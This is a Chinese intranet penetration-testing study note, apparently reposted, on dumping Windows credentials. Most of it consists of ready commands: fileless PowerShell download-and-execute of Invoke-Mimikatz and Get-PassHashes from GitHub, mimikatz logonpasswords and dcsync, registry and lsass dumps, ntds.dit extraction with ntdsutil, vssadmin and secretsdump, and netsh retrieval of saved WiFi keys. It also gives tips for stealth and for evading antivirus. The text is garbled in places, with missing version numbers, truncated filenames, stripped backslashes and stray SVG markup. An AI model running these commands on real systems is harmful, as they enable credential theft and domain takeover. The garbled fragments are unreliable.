内网学习笔记 | 密码抓取
更新时间:2026-02-07 12:44:18
内网学习笔记 | 密码抓取
- 前言
Windows 系统通常使用两种方法来加密用户的密码:在域环境中,密码信息以哈希值的形式存储在名为 ntds.dit 的二进制文件中,该文件位于 `%SystemRoot%\ntds` 目录下。此文件始终受到活动目录的访问限制,因此用户难以直接读取它。
在非域环境下,SAM文件中的用户密码及其他信息同样受到系统限制,无法随意访问。
在Windows系统中,密码主要由LM Hash和NTLM Hash两部分构成。结构为:代码语言:JavaScript;运行次数:。
运行
复制
<pre class="brush:php;toolbar:false;">username:RID:LM-Hash:NT-Hash登录后复制
LM Hash(本地管理哈希)是Windows系统最初使用的加密技术,由IBM设计,实质上就是DES加密方法。由于采用了固定长度的密钥,并且结合了其他特性使其更加脆弱,微软于在NT 本中引入了NTLM协议来保护网络安全。
NTLM Hash 是一种基于MD加密算法,自Windows Vista系统后,个人版和之后的服务版开始采用,而服务版则从Windows Server 后也采用了这种方法。微软为了兼容性考虑,虽然禁用了LM Hash,但依旧保留了NTLM Hash.
在 Windows Vista 和 Server 及之前默认采用 LM 加密,仅当用户密码超过 位时才切换到 NTLM 加密。自 Vista 开始,系统不再使用 LM Hash 加密,统一采用 NTLM Hash 加密。
如果用户密码为空或不存储LMHash,则在Windows Server 后的系统中抓取到的LMHash是AADEAADE,这些LMHash已没有任何实际意义。
也就是说从Windows Vista 和 Windows Server 2008 开始,默认情况下只存储 NTLM Hash,LM Hash 将不再被使用。
下面看下常见的抓取密码的工具。1、GetPass
GetPass 下载地址:https://bbs.pediy.com/thread-163383.htm
以管理员权限直接运行 GetPassword.exe 直接查看到明文密码 2、PwDump7
PwDump7 下载地址:https://www.tarasco.org/security/pwdump_7/
PwDump提供了仅hash的用户数据展示功能,但无密码显示;同时支持使用hash进行密码破解或直接查询。
PwDump7 同样使用管理员权限直接运行即可。 3、QuarkPwDump
QuarkPwDump 下载地址:https://raw.githubusercontent.com/tuthimi/quarkspwdump/master/Release/QuarksPwDump.exe
运行以下命令导出用户 Hash代码语言:javascript代码运行次数:0
运行
复制
<pre class="brush:php;toolbar:false;">QuarkPwDump.exe --dump-hash-local登录后复制4、Get-PassHashes
Get-PassHashes 是一个 PS 脚本,Get-PassHashes 下载地址:https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1
导入 ps1 脚本,以管理员权限执行 Get-PassHashes 即可。代码语言:javascript代码运行次数:0
运行
复制
<pre class="brush:php;toolbar:false;">Import-Module .Get-PassHashes.ps1Get-PassHashes登录后复制
或者绕过无法执行 PS 脚本的限制,直接无文件执行(推荐),同样需要管理员权限。代码语言:javascript代码运行次数:0
运行
复制
使用代理:powershell -exec bypass -c IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps);Get-PassHashes;无需代理,如果目标无法访问 GitHub 使用此命令。使用 MIMIKATZ 登录后复制 mimikatz。
说到密码抓取,又怎能少得了 mimikatz 呢。
Mimikatz 是由法国技术大神 Benjamin Delpy 编写的轻量级系统调试工具,能够从内存中提取明文密码、散列值、PIN 和 K 票据,并执行哈希传递、票据传递和构建黄金票据等操作。
mimikatz 项目 releases 地址:https://github.com/gentilkiwi/mimikatz/releases
使用 mimikatz 读取本地 SAM 文件,获取 NTLM Hash代码语言:javascript代码运行次数:0
运行
复制
<pre class="brush:php;toolbar:false;">mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam"登录后复制
或者使用 mimikatz 直接查看明文密码代码语言:javascript代码运行次数:0
运行
复制
<pre class="brush:php;toolbar:false;">mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"登录后复制
除了使用 PowerShell 进行远程加载 mimikatz 之外,这种方法相比直接拷贝 mimikatz.exe 要更加隐秘。通过 JavaScript 实现了更高效的模拟攻击。
运行
复制
使用代理的命令:powershell.exe -exec bypass -c IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps);Invoke-Mimikatz不使用代理,直接执行:powershell.exe -exec bypass -c IEX (New-Object System.Net.Webclient).DownloadString('https://ghproxy.com/raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps);Invoke-Mimikatz在目标系统上登录,复制SAM、SYSTEM、SECURITY文件并导出。
直接注册表导出 SAM、SYSTEM、SECURITY 文件代码语言:javascript代码运行次数:0
运行
复制
<pre class="brush:php;toolbar:false;">reg save HKLMSAM sam.hivreg save HKLMSYSTEM system.hivreg save HKLMSECURITY security.hiv登录后复制
或者使用 ninjacopy 脚本,下载地址:https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-NinjaCopy.ps1代码语言:javascript代码运行次数:0
运行
复制
<pre class="brush:php;toolbar:false;">Import-Module -name .Invoke-NinjaCopy.ps1Invoke-NinjaCopy -Path "C:WindowsSystem32configSAM" -LocalDestination "c:sam.hiv"Invoke-NinjaCopy -Path "C:WindowsSystem32configSYSTEM" -LocalDestination "c:system.hiv"Invoke-NinjaCopy -Path "C:WindowsSystem32configSECURITY" -LocalDestination "c:security.hiv"登录后复制
如果条件允许也可以使用 U 盘启动盘直接拷贝以下文件代码语言:javascript代码运行次数:0
运行
复制
<pre class="brush:php;toolbar:false;">C:WindowsSystem32configSAMC:WindowsSystem32configSYSTEMC:WindowsSystem32configSECURITY登录后复制代码语言:javascript代码运行次数:0
运行
复制
除了利用漏洞,还可以通过CVE-取SAM、SYSTEM和SECURITY文件。参考https://teamssix.com/html下载并提取哈希。
用 mimikatz 获取代码语言:javascript代码运行次数:0
运行
复制
<pre class="brush:php;toolbar:false;">mimikatz.exelsadump::sam /sam:sam.hiv /system:system.hiv登录后复制
使用 Cain,搜索Cracker中的LM和NTLM哈希值,点击+号,选择从SAM导入,选择SAM文件后,查看SYSTEM文件的HEX码,将其复制到BootKey中,然后点击下一步进行查看。
cain 还可以直接查看明文密码,在 Decoders 里找到 LSA Secrets,导入 system.hiv 和 security.hiv 就可以看到明文的密码了。
用 SAMInside 读取,直接在 File 菜单中选择导入 SAM 和 SYSTEM 文件即可 7、lsass.dmp 文件导出文件
任务管理器导出 lsass.dmp 文件,在任务管理器中找到 lsass.exe 右击选择创建转储文件即可。
使用 Microsoft 官方 Procdump 工具导出 lsass.dmp 文件,无需担心杀软拦截。立即访问 https://download.sysinternals.com/files/Procdump.zip 下载并使用 JavaScript 代码实现自动化。
运行
复制
<pre class="brush:php;toolbar:false;">procdump -accepteula -ma lsass.exe lsass.DMP登录后复制获取 HASH
使用 mimikatz 可获取 lsass.dmp 文件里的 hash 以及明文密码值代码语言:javascript代码运行次数:0
运行
复制
<pre class="brush:php;toolbar:false;">mimikatz.exesekurlsa::minidump lsass.DMPsekurlsa::logonPasswords full登录后复制8、ntds.dit 文件
在域中的所有账号密码存于ntds.dit文件中,如获取此文件则可掌控全部域权限;但该文件专属于域控制器。
ntds.dit 文件位置:代码语言:javascript代码运行次数:0
运行
复制
<pre class="brush:php;toolbar:false;">C:WindowsNTDSNTDS.dit登录后复制导出 ntds.dit
Ntdsutil 导出 ntds.dit 和 system 文件,并放在 C 盘目录下代码语言:javascript代码运行次数:0
运行
复制
<pre class="brush:php;toolbar:false;">Ntdsutil "activate instance ntds" Ifm "create full C: tdsutil" Quit quit登录后复制
vssadmin 导出 ntds.dit代码语言:javascript代码运行次数:0
运行
复制
<pre class="brush:php;toolbar:false;">vssadmin create shadow /for=C:copy \"http://www.w3.org/2000/svg" viewbox="0 0 16 16" fill="none">
运行
复制
<pre class="brush:php;toolbar:false;">Import-Module -name .Invoke-NinjaCopy.ps1Invoke-NinjaCopy -Path "C:windows tds tds.dit" -LocalDestination "C: tds.dit"登录后复制获取 HASH
NTDSDumpEx 查看 ntds.dit,下载地址:https://github.com/zcgonvh/NTDSDumpEx/releases代码语言:javascript代码运行次数:0
运行
复制
<pre class="brush:php;toolbar:false;">NTDSDumpEx -d ntds.dit -s system.hiv -o domain.txt登录后复制
或者使用 impacket 里的 secretsdump.py 脚本查看 ntds.dit 内容,下载地址:https://github.com/SecureAuthCorp/impacket代码语言:javascript代码运行次数:0
运行
复制
<pre class="brush:php;toolbar:false;">python3 secretsdump.py -ntds ntds.dit -system system.hiv LOCAL登录后复制
除了将 `ntds.dit` 复制到本地外,mimikatz 还可以直接查看本机上的域用户密码信息。这种方式相比将 `ntds.dit` 拷贝到自己的机器上更加隐蔽,但它可能会因为直接访问系统资源而降低一些安全性。
运行
复制
<pre class="brush:php;toolbar:false;">mimikatz.exe# 直接获取 teamssix 域内所有用户 hashlsadump::dcsync /domain:teamssix.com /all /csv# 获取单个用户的详细信息lsadump::dcsync /domain:teamssix.com /user:administrator登录后复制9、WIFI 密码
使用自带命令可直接查询代码语言:javascript代码运行次数:0
运行
复制
<pre class="brush:php;toolbar:false;"># 获取登录过的 WIFI 名称netsh wlan show profiles# 获取某个连接过的 WIFI 密码netsh wlan show profile name="teamssix" key=clear# 获取所有连接过的 WIFI 密码for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear登录后复制
往期推荐
内网学习笔记 | 26、ntds.dit 的提取与散列值导出
内网学习笔记 | 25、Exchange 邮件服务器
内网学习笔记 | 24、SPN 的应用
以上就是内网学习笔记 | 密码抓取的详细内容,更多请关注其它相关文章!
